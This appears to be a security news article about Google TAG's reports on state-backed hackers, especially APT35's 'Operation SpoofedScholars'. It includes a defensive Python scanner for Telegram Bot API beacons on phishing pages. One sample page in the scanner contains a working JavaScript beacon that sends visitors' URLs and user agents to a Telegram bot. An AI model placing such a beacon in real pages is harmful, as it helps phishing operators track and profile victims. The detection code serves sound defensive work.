On Thursday, Google’s Threat Analysis Group (TAG) revealed that it is currently monitoring over 270 state-sponsored threat actors operating across more than 50 countries. Since the beginning of 2021, TAG has issued approximately 50,000 alerts concerning phishing and malware attempts tied to these government-backed actors.

This represents a 33% increase in alerts when compared to 2020, largely attributed to Google’s efforts in thwarting a significant campaign orchestrated by a Russian group known as APT28, colloquially referred to as Fancy Bear.

In addition, Google disclosed its disruption of multiple campaigns attributed to the Iranian state-sponsored group APT35, also known as Charming Kitten, Phosphorus, or Newscaster. This group executed a complex social engineering scheme labeled “Operation SpoofedScholars,” targeting think tanks, journalists, and academics to extract sensitive information by impersonating scholars from the University of London’s School of Oriental and African Studies (SOAS).

Proofpoint, a cybersecurity firm, first documented details of this attack in July 2021. The operation involved uploading a spyware-laden VPN application to the Google Play Store; once installed, the app could capture sensitive information, including call logs, text messages, contacts, and location data, from compromised devices. Notably, APT35 employed an unusual technique, using Telegram to receive real-time notifications whenever phishing sites under their control were visited, by embedding malicious JavaScript in the pages.
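A defender reviewing a suspected phishing page can look for exactly this kind of beacon: inline or external script that calls the Telegram Bot API. The following scanner is an added example written for this article, not code from Google TAG, Proofpoint, or the campaign itself. It assumes the real Telegram Bot API URL shape (`https://api.telegram.org/bot<token>/...`), uses an approximate regex for the token format so that any token found can be redacted before the finding is logged, and runs over two constructed sample pages (one benign, one carrying a beacon) rather than real captured kits.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages for this example (not real phishing kits).
BENIGN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><form action="/login" method="post">
<input name="user"><input name="pw" type="password"></form></body></html>"""

BEACON_PAGE = """<html><body>
<form action="/login" method="post"><input name="email"></form>
<script>
  // placeholder token, constructed for this example
  var t = "123456789:EXAMPLE_PLACEHOLDER_TOKEN";
  fetch("https://api.telegram.org/bot" + t + "/sendMessage?chat_id=1&text="
        + encodeURIComponent(location.href + " " + navigator.userAgent));
</script></body></html>"""

# Telegram Bot API endpoints always live under api.telegram.org/bot<token>/.
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)
# Approximate shape of a bot token (digits, colon, long alphanumeric secret);
# an assumption used only so the token can be redacted from findings.
BOT_TOKEN = re.compile(r"\b\d{6,}:[A-Za-z0-9_-]{20,}\b")


class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external script src attributes."""

    def __init__(self):
        super().__init__()
        self._buf = None
        self.inline = []    # full text of each inline script
        self.external = []  # src URL of each external script

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None


def redact(text):
    """Replace anything that looks like a bot token so logs never store it."""
    return BOT_TOKEN.sub("<redacted-token>", text)


def find_telegram_beacons(html):
    """Return a list of findings describing Telegram Bot API use in a page.

    Each finding records whether the reference was inline or external and
    the (token-redacted) lines that justify it, suitable for a triage note.
    """
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for body in parser.inline:
        if TELEGRAM_API.search(body):
            evidence = [
                redact(line.strip())
                for line in body.splitlines()
                if TELEGRAM_API.search(line) or BOT_TOKEN.search(line)
            ]
            findings.append({"kind": "inline", "evidence": evidence})
    for src in parser.external:
        if TELEGRAM_API.search(src):
            findings.append({"kind": "external", "evidence": [redact(src)]})
    return findings


if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("beacon", BEACON_PAGE)):
        print(name, find_telegram_beacons(page))
```

The benign page yields no findings; the beacon page yields one inline finding whose evidence lines show the `api.telegram.org/bot` call with the token replaced by `<redacted-token>`. Running this over the HTML of pages referenced in phishing emails gives an analyst a quick signal that visitor data is being forwarded to a Telegram bot, without copying the operator's token into tickets or logs.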

The group has also been known to impersonate policy officials by sending seemingly benign initial contact emails about high-profile conferences, such as the Munich Security Conference and the Think-20 (T20) Italy forum. This tactic is part of their broader phishing campaigns, designed to lure influential individuals to malicious websites.

According to Ajax Bash of Google TAG, for years, APT35 has relied on account hijacking, malware deployment, and innovative methods to engage in espionage aligned with Iranian governmental interests. The ramifications of these ongoing threats serve as a stark reminder for organizations to enhance their cybersecurity measures to mitigate risks associated with state-sponsored cyber activities.
